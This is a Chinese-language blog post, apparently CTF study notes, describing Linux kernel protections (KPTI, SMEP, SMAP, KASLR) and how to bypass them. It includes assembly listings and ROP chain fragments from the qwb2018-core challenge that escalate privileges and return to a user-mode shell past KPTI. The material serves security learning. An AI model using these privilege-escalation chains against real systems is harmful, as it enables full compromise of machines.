<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>kernel常见保护 | Hexo</title><meta name="author" content="John Doe"><meta name="copyright" content="John Doe"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="常见保护一.KPTIkpti简介简单说就是内核页表隔离：可以访问用户空间内存，但是不能执行用户空间代码；即无法直接通过构造swapgs_iretq的ROP来返回用户态。 PGD:出现用于处理中断 所以有一个CR3寄存器 PGD:当CR3[12]为1时为用户态，为0时为内核态，所以关键是要看怎么切换CR3[12]。 ASID:当CR3[11]为1时为用户态，为0时为内核态，所以关键是要看怎么切换CR">
<meta property="og:type" content="article">
<meta property="og:title" content="kernel常见保护">
<meta property="og:url" content="http://example.com/2025/10/23/kernel%E5%B8%B8%E8%A7%81%E4%BF%9D%E6%8A%A4/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="常见保护一.KPTIkpti简介简单说就是内核页表隔离：可以访问用户空间内存，但是不能执行用户空间代码；即无法直接通过构造swapgs_iretq的ROP来返回用户态。 PGD:出现用于处理中断 所以有一个CR3寄存器 PGD:当CR3[12]为1时为用户态，为0时为内核态，所以关键是要看怎么切换CR3[12]。 ASID:当CR3[11]为1时为用户态，为0时为内核态，所以关键是要看怎么切换CR">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/img/butterfly-icon.png">
<meta property="article:published_time" content="2025-10-23T11:18:40.000Z">
<meta property="article:modified_time" content="2025-10-23T12:19:17.282Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/img/butterfly-icon.png"><script type="application/ld+json">{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "kernel常见保护",
  "url": "http://example.com/2025/10/23/kernel%E5%B8%B8%E8%A7%81%E4%BF%9D%E6%8A%A4/",
  "image": "http://example.com/img/butterfly-icon.png",
  "datePublished": "2025-10-23T11:18:40.000Z",
  "dateModified": "2025-10-23T12:19:17.282Z",
  "author": [
    {
      "@type": "Person",
      "name": "John Doe",
      "url": "http://example.com"
    }
  ]
}</script><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2025/10/23/kernel%E5%B8%B8%E8%A7%81%E4%BF%9D%E6%8A%A4/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><script>
    (() => {
      
    const saveToLocal = {
      set: (key, value, ttl) => {
        if (!ttl) return
        const expiry = Date.now() + ttl * 86400000
        localStorage.setItem(key, JSON.stringify({ value, expiry }))
      },
      get: key => {
        const itemStr = localStorage.getItem(key)
        if (!itemStr) return undefined
        const { value, expiry } = JSON.parse(itemStr)
        if (Date.now() > expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return value
      }
    }

    window.btf = {
      saveToLocal,
      getScript: (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        Object.entries(attr).forEach(([key, val]) => script.setAttribute(key, val))
        script.onload = script.onreadystatechange = () => {
          if (!script.readyState || /loaded|complete/.test(script.readyState)) resolve()
        }
        script.onerror = reject
        document.head.appendChild(script)
      }),
      getCSS: (url, id) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onload = link.onreadystatechange = () => {
          if (!link.readyState || /loaded|complete/.test(link.readyState)) resolve()
        }
        link.onerror = reject
        document.head.appendChild(link)
      }),
      addGlobalFn: (key, fn, name = false, parent = window) => {
        if (!false && key.startsWith('pjax')) return
        const globalFn = parent.globalFn || {}
        globalFn[key] = globalFn[key] || {}
        globalFn[key][name || Object.keys(globalFn[key]).length] = fn
        parent.globalFn = globalFn
      }
    }
  
      
      const activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      const activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }

      btf.activateDarkMode = activateDarkMode
      btf.activateLightMode = activateLightMode

      const theme = saveToLocal.get('theme')
    
          theme === 'dark' ? activateDarkMode() : theme === 'light' ? activateLightMode() : null
        
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
      }
    
      
    const detectApple = () => {
      if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
  
    })()
  </script><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false,"highlightFullpage":false,"highlightMacStyle":false},
  copy: {
    success: 'Copy Successful',
    error: 'Copy Failed',
    noSupport: 'Browser Not Supported'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: 'Just now',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  lightbox: 'null',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid/dist/infinitegrid.min.js',
    buttonText: 'Load More'
  },
  isPhotoFigcaption: false,
  islazyloadPlugin: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'kernel常见保护',
  isHighlightShrink: false,
  isToc: true,
  pageType: 'post'
}</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="post" id="body-wrap"><header class="post-bg" id="page-header"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><span class="site-name">Hexo</span></a><a class="nav-page-title" href="/"><span class="site-name">kernel常见保护</span><span class="site-name"><i class="fa-solid fa-circle-arrow-left"></i><span>  Back to Home</span></span></a></span><div id="menus"></div></nav><div id="post-info"><h1 class="post-title">kernel常见保护</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2025-10-23T11:18:40.000Z" title="Created 2025-10-23 19:18:40">2025-10-23</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2025-10-23T12:19:17.282Z" title="Updated 2025-10-23 20:19:17">2025-10-23</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title=""><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post Views:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="container post-content" id="article-container"><h1 id="常见保护"><a href="#常见保护" class="headerlink" title="常见保护"></a>常见保护</h1><h2 id="一-KPTI"><a href="#一-KPTI" class="headerlink" title="一.KPTI"></a><strong>一.KPTI</strong></h2><h3 id="kpti简介"><a href="#kpti简介" class="headerlink" title="kpti简介"></a>kpti简介</h3><p>简单说就是内核页表隔离：可以访问用户空间内存，但是不能执行用户空间代码；即无法直接通过构造swapgs_iretq的ROP来返回用户态。</p>
<p>PGD:出现用于处理中断</p>
<p>所以有一个CR3寄存器</p>
<p>PGD:当CR3[12]为1时为用户态，为0时为内核态，所以关键是要看怎么切换CR3[12]。</p>
<p>ASID:当CR3[11]为1时为用户态，为0时为内核态，所以关键是要看怎么切换CR3[11]。一般CR4开启PCIDE时CR3的低12位才有意义，正常情况下都是置为0</p>
<p>所以一旦开启kpti就不能使用ret2user，因为内核态无法确认用户态页表</p>
<h3 id="kpti绕过"><a href="#kpti绕过" class="headerlink" title="kpti绕过"></a>kpti绕过</h3><h4 id="swap-CR3"><a href="#swap-CR3" class="headerlink" title="swap CR3"></a>swap CR3</h4><p>在一个开启 KPTI内核中会调用SWITCH_KERNEL_CR3_NO_STACK函数来从用户态进入内核态，关键代码如下所示：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mov     rdi, cr3</span><br><span class="line">nop</span><br><span class="line">nop</span><br><span class="line">nop</span><br><span class="line">nop</span><br><span class="line">nop</span><br><span class="line">and     rdi, <span class="number">0xFFFFFFFFFFFFE7FF</span></span><br><span class="line">mov     cr3, rdi</span><br></pre></td></tr></table></figure>

<p>这个作用就是将CR3[11]&#x3D;CR3[12]&#x3D;0;</p>
<p>而从内核态返回到用户态调用 SWITCH_USER_CR3宏来切换 CR3如下所示：就是将其加在swapgs前</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mov     rdi, cr3</span><br><span class="line">or      rdi, <span class="number">1000</span>h</span><br><span class="line">mov     cr3, rdi</span><br></pre></td></tr></table></figure>

<p>可以参考qwb2018-core</p>
<pre><code>// 1. 提权
rop[i++] = pop_rdi;
rop[i++] = 0;
rop[i++] = prepare_kernel_cred;
rop[i++] = pop_rdx;
rop[i++] = commit_creds;
rop[i++] = mov_rdi_rax;
// === 新增：KPTI绕过部分 ===
// 方法一：使用单独的gadgets手动切换CR3
rop[i++] = mov_rdi_cr3;      // 将当前CR3读到RDI
rop[i++] = or_rdi_0x1000;    // RDI = RDI | 0x1000 (切换到用户页表)
rop[i++] = mov_cr3_rdi;      // 将修改后的值写回CR3

// 方法二：或者直接跳转到KPTI trampoline（如果找到的话）
// rop[i++] = kpti_trampoline;

// 恢复执行环境并返回用户态
rop[i++] = swapgs;
rop[i++] = 0;
rop[i++] = iretq;
rop[i++] = (size_t)getshell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;
</code></pre>
<h4 id="swapgs-restore-regs-and-return-to-usermode"><a href="#swapgs-restore-regs-and-return-to-usermode" class="headerlink" title="swapgs_restore_regs_and_return_to_usermode"></a>swapgs_restore_regs_and_return_to_usermode</h4><p>直接找vmlinux汇编代码</p>
<p> swapgs_restore_regs_and_return_to_usermode</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">.text:FFFFFFFF81600A34 41 5F                          pop     r15</span><br><span class="line">.text:FFFFFFFF81600A36 41 5E                          pop     r14</span><br><span class="line">.text:FFFFFFFF81600A38 41 5D                          pop     r13</span><br><span class="line">.text:FFFFFFFF81600A3A 41 5C                          pop     r12</span><br><span class="line">.text:FFFFFFFF81600A3C 5D                             pop     rbp</span><br><span class="line">.text:FFFFFFFF81600A3D 5B                             pop     rbx</span><br><span class="line">.text:FFFFFFFF81600A3E 41 5B                          pop     r11</span><br><span class="line">.text:FFFFFFFF81600A40 41 5A                          pop     r10</span><br><span class="line">.text:FFFFFFFF81600A42 41 59                          pop     r9</span><br><span class="line">.text:FFFFFFFF81600A44 41 58                          pop     r8</span><br><span class="line">.text:FFFFFFFF81600A46 58                             pop     rax</span><br><span class="line">.text:FFFFFFFF81600A47 59                             pop     rcx</span><br><span class="line">.text:FFFFFFFF81600A48 5A                             pop     rdx</span><br><span class="line">.text:FFFFFFFF81600A49 5E                             pop     rsi</span><br><span class="line">.text:FFFFFFFF81600A4A 48 89 E7                       mov     rdi, rsp    </span><br><span class="line">.text:FFFFFFFF81600A4D 65 48 8B 24 25+                mov     rsp, gs: 0x5004//从此处开始执行</span><br><span class="line">.text:FFFFFFFF81600A56 FF 77 30                       push    qword ptr [rdi+30h]</span><br><span class="line">.text:FFFFFFFF81600A59 FF 77 28                       push    qword ptr [rdi+28h]</span><br><span class="line">.text:FFFFFFFF81600A5C FF 77 20                       push    qword ptr [rdi+20h]</span><br><span class="line">.text:FFFFFFFF81600A5F FF 77 18                       push    qword ptr [rdi+18h]</span><br><span class="line">.text:FFFFFFFF81600A62 FF 77 10                       push    qword ptr [rdi+10h]</span><br><span class="line">.text:FFFFFFFF81600A65 FF 37                          push    qword ptr [rdi]</span><br><span class="line">.text:FFFFFFFF81600A67 50                             push    rax</span><br><span class="line">.text:FFFFFFFF81600A68 EB 43                          nop</span><br><span class="line">.text:FFFFFFFF81600A6A 0F 20 DF                       mov     rdi, cr3</span><br><span class="line">.text:FFFFFFFF81600A6D EB 34                          jmp     0xFFFFFFFF81600AA3</span><br><span class="line"></span><br><span class="line">.text:FFFFFFFF81600AA3 48 81 CF 00 10+                or      rdi, 1000h</span><br><span class="line">.text:FFFFFFFF81600AAA 0F 22 DF                       mov     cr3, rdi</span><br><span class="line">.text:FFFFFFFF81600AAD 58                             pop     rax</span><br><span class="line">.text:FFFFFFFF81600AAE 5F                             pop     rdi</span><br><span class="line">.text:FFFFFFFF81600AAF FF 15 23 65 62+                call    cs: SWAPGS</span><br><span class="line">.text:FFFFFFFF81600AB5 FF 25 15 65 62+                jmp     cs: INTERRUPT_RETURN</span><br><span class="line"></span><br><span class="line">_SWAPGS</span><br><span class="line">.text:FFFFFFFF8103EFC0 55                             push    rbp</span><br><span class="line">.text:FFFFFFFF8103EFC1 48 89 E5                       mov     rbp, rsp</span><br><span class="line">.text:FFFFFFFF8103EFC4 0F 01 F8                       swapgs</span><br><span class="line">.text:FFFFFFFF8103EFC7 5D                             pop     rbp</span><br><span class="line">.text:FFFFFFFF8103EFC8 C3                             retn</span><br><span class="line"></span><br><span class="line">_INTERRUPT_RETURN</span><br><span class="line">.text:FFFFFFFF81600AE0 F6 44 24 20 04                 test    byte ptr [rsp+0x20], 4</span><br><span class="line">.text:FFFFFFFF81600AE5 75 02                          jnz     native_irq_return_ldt</span><br><span class="line">.text:FFFFFFFF81600AE7 48 CF                          iretq</span><br></pre></td></tr></table></figure>

<p>可以参考qwb2018-core</p>
<pre><code>	rop[i++] = canary;	
	rop[i++] = 0;
 	rop[i++] = pop_rdi;
 	rop[i++] = 0;
	rop[i++] = prepare_kernel_cred;
 	rop[i++] = pop_rdx;
 	rop[i++] = commit_creds;
 	rop[i++] = mov_rdi_rax;
 	//swapgs --&gt; iretq: rip, cs, rflags, rsp, ss. GetShell
 	rop[i++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 22 + kernel_offset; //就是ida中mov rdi,rsp开头
 	rop[i++] = 随便来个地址
 	rop[i++] = 随便来个地址
 	rop[i++] = (size_t)getshell;
	rop[i++] = user_cs;
	rop[i++] = user_rflags;
	rop[i++] = user_sp;
 	rop[i++] = user_ss;
</code></pre>
<p>参考： <a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/240006#h3-2">Linux Kernel KPTI保护绕过 - 安全客，安全资讯平台 (anquanke.com)</a> </p>
<h3 id="怎么查看"><a href="#怎么查看" class="headerlink" title="怎么查看"></a>怎么查看</h3><p>1.进入内核</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./start.sh</span><br><span class="line">cat /sys/devices/system/cpu/vulnerabilities/*</span><br></pre></td></tr></table></figure>

<p>2.看start.sh</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-append &quot;console=ttyS0 quiet root=/dev/sda rw init=/init oops=panic panic=1 panic_on_warn=1 kaslr pti=on&quot; \</span><br></pre></td></tr></table></figure>

<h2 id="二-SMEP、SMAP、KASLR等"><a href="#二-SMEP、SMAP、KASLR等" class="headerlink" title="二.SMEP、SMAP、KASLR等"></a>二.SMEP、SMAP、KASLR等</h2><p>基本上start.sh里都有写</p>
<h3 id="SMEP"><a href="#SMEP" class="headerlink" title="SMEP:"></a>SMEP:</h3><p>内核态下，禁止<strong>执行</strong>用户空间的内存。 </p>
<h3 id="SMAP"><a href="#SMAP" class="headerlink" title="SMAP:"></a>SMAP:</h3><p> 内核态下，禁止<strong>读写</strong>用户空间的内存。（可通过特定指令临时关闭） </p>
<p> 可以通过ROP修改CR3寄存器来绕过 </p>
<h3 id="KASLR"><a href="#KASLR" class="headerlink" title="KASLR:"></a>KASLR:</h3><p> 通常需要泄露地址，可以通过以下命令查看当前基地址 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/kallsyms | grep startup_64</span><br></pre></td></tr></table></figure>

<p> <img src="https://pig-007.oss-cn-beijing.aliyuncs.com/img/202201181206238.png" alt="image-20220118120655137"> </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo 1 &gt; /proc/sys/kernel/kptr_restrict//大多数init.sh都开启了这个，所以不能直接访问</span><br></pre></td></tr></table></figure>

<p>但是也可以爆破，KASLR的随机化程度只有9bit </p>
<h2 id="三-其他保护"><a href="#三-其他保护" class="headerlink" title="三.其他保护"></a>三.其他保护</h2><p>STACK PROTECTOR：类似用户态的cancary</p>
<p>参考README.MD：有时候出题人给的README.MD会给配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">plaintextCONFIG_SLAB=y</span><br><span class="line">CONFIG_SLAB_FREELIST_RANDOM=y</span><br><span class="line">CONFIG_SLAB_FREELIST_HARDENED=y</span><br><span class="line">CONFIG_HARDENED_USERCOPY=y</span><br><span class="line">CONFIG_STATIC_USERMODEHELPER=y</span><br><span class="line">CONFIG_STATIC_USERMODEHELPER_PATH=&quot;&quot;</span><br></pre></td></tr></table></figure>

<p>  如上就是使用SLAB分配，开启RANDOM和HARDENED保护，以及Hardened Usercopy（内核空间指针也会进行非常严格的安全性检查，包括不允许为空指针、不允许指向 <code>kmalloc</code> 分配的零长度区域、不允许指向内核代码段、如果指向 Slab 则不允许超过 Slab 分配器分配的长度、如果涉及到栈则不允许超出当前进程的栈空间等等。）和 Static Usermodehelper Path（modprobe_path 为只读，不可修改） </p>
<p>参考：<a target="_blank" rel="noopener" href="https://arttnba3.cn/2021/10/31/CTF-0X05-TCTF2021_FINAL/">【CTF.0x05】TCTF2021-FINAL 两道 kernel pwn 题解 - arttnba3’s blog</a> </p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>Author: </span><span class="post-copyright-info"><a href="http://example.com">John Doe</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>Link: </span><span class="post-copyright-info"><a href="http://example.com/2025/10/23/kernel%E5%B8%B8%E8%A7%81%E4%BF%9D%E6%8A%A4/">http://example.com/2025/10/23/kernel%E5%B8%B8%E8%A7%81%E4%BF%9D%E6%8A%A4/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>Copyright Notice: </span><span class="post-copyright-info">All articles on this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless otherwise stated.</span></div></div><div class="tag_share"><div class="post-share"><div class="social-share" data-image="/img/butterfly-icon.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><a class="pagination-related" href="/2025/10/24/kernel%E6%8A%80%E5%B7%A7/" title="kernel技巧"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info"><div class="info-1"><div class="info-item-1">Previous</div><div class="info-item-2">kernel技巧</div></div><div class="info-2"><div class="info-item-1">基操拿到一个core.cpio，一般得到的都是压缩包，先将其回归到正常的名字，mv core.cpio core.cpio.gz,然后将其解压，gunzip core.cpio.gz,解压后的状态就是运行起仿真所需要的core.cpio； 然后我们将exp放入重新生成一个core.cpio要怎么办呢，先生成一个空的文件夹，mkdir core；cd core，cpio -idmv &lt;core.cpio,就得到了core.cpio的东西了，然后编译exp，gcc exp..c -static -masm=intel -g-o exp,将其放入core文件夹，在core文件夹中执行find . | cpio -o --format=newc &gt;core.cpio，会在该文件夹中获取到一个core.cpio，放回start.sh目录下，运行期环境然后执行就可以了 泄露地址一般开启KASLR的时候寻找地址 1.Dmesg在启动内核后可以查看内核的信息，如dmesg | grep -i &quot;kernel可以查看内核的地址信息 但是，在init.sh文件中有 echo 1...</div></div></div></a><a class="pagination-related" href="/2025/10/07/DIR-815/" title="DIR-815"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info text-right"><div class="info-1"><div class="info-item-1">Next</div><div class="info-item-2">DIR-815</div></div><div class="info-2"><div class="info-item-1">首先：123wget https://unzip 文件名binwalk -Me .bin  IDA：漏洞函数123456789101112131415161718192021222345行	v0是请求方式，发现是post方式if ( strcasecmp(v0, &quot;POST&quot;) )&#123;  v1 = &quot;unsupported HTTP request&quot;;  goto LABEL_7;&#125;50行	进入这个函数cgibin_parse_request(sub_409AC4, 0, 0x20000);50/22行	输入两个环境变量，getenv为查找变量的值 if ( getenv(&quot;CONTENT_TYPE&quot;) &amp;&amp; (v6 = getenv(&quot;CONTENT_LENGTH&quot;)) != 0 )  50/32	 v10 = getenv(&quot;REQUEST_URI&quot;);  回到hedwigcgi_main: 67行	进入这个函数 sess_get_uid(v4...</div></div></div></a></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info text-center"><div class="avatar-img"><img src="/img/butterfly-icon.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">John Doe</div><div class="author-info-description"></div><div class="site-data"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">13</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">0</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">0</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>Announcement</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>Contents</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E4%BF%9D%E6%8A%A4"><span class="toc-number">1.</span> <span class="toc-text">常见保护</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-KPTI"><span class="toc-number">1.1.</span> <span class="toc-text">一.KPTI</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#kpti%E7%AE%80%E4%BB%8B"><span class="toc-number">1.1.1.</span> <span class="toc-text">kpti简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#kpti%E7%BB%95%E8%BF%87"><span class="toc-number">1.1.2.</span> <span class="toc-text">kpti绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#swap-CR3"><span class="toc-number">1.1.2.1.</span> <span class="toc-text">swap CR3</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#swapgs-restore-regs-and-return-to-usermode"><span class="toc-number">1.1.2.2.</span> <span class="toc-text">swapgs_restore_regs_and_return_to_usermode</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%8E%E4%B9%88%E6%9F%A5%E7%9C%8B"><span class="toc-number">1.1.3.</span> <span class="toc-text">怎么查看</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-SMEP%E3%80%81SMAP%E3%80%81KASLR%E7%AD%89"><span class="toc-number">1.2.</span> <span class="toc-text">二.SMEP、SMAP、KASLR等</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SMEP"><span class="toc-number">1.2.1.</span> <span class="toc-text">SMEP:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SMAP"><span class="toc-number">1.2.2.</span> <span class="toc-text">SMAP:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#KASLR"><span class="toc-number">1.2.3.</span> <span class="toc-text">KASLR:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89-%E5%85%B6%E4%BB%96%E4%BF%9D%E6%8A%A4"><span class="toc-number">1.3.</span> <span class="toc-text">三.其他保护</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>Recent Posts</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2025/11/06/kernel-UAF/" title="kernel-UAF">kernel-UAF</a><time datetime="2025-11-06T10:26:24.000Z" title="Created 2025-11-06 18:26:24">2025-11-06</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2025/10/31/kernel-heap/" title="kernel heap">kernel heap</a><time datetime="2025-10-31T11:21:14.000Z" title="Created 2025-10-31 19:21:14">2025-10-31</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2025/10/26/kaslr%E7%88%86%E7%A0%B4/" title="kaslr爆破">kaslr爆破</a><time datetime="2025-10-26T09:59:05.000Z" title="Created 2025-10-26 17:59:05">2025-10-26</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2025/10/25/kernel-stack/" title="kernel stack">kernel stack</a><time datetime="2025-10-25T10:15:20.000Z" title="Created 2025-10-25 18:15:20">2025-10-25</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2025/10/24/kernel%E6%8A%80%E5%B7%A7/" title="kernel技巧">kernel技巧</a><time datetime="2025-10-24T13:14:22.000Z" title="Created 2025-10-24 21:14:22">2025-10-24</time></div></div></div></div></div></div></main><footer id="footer"><div class="footer-other"><div class="footer-copyright"><span class="copyright">&copy;&nbsp;2025 By John Doe</span><span class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo 7.3.0</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly 5.5.0</a></span></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Reading Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Toggle Between Light and Dark Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="Toggle Between Single-column and Double-column"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="Settings"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back to Top"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>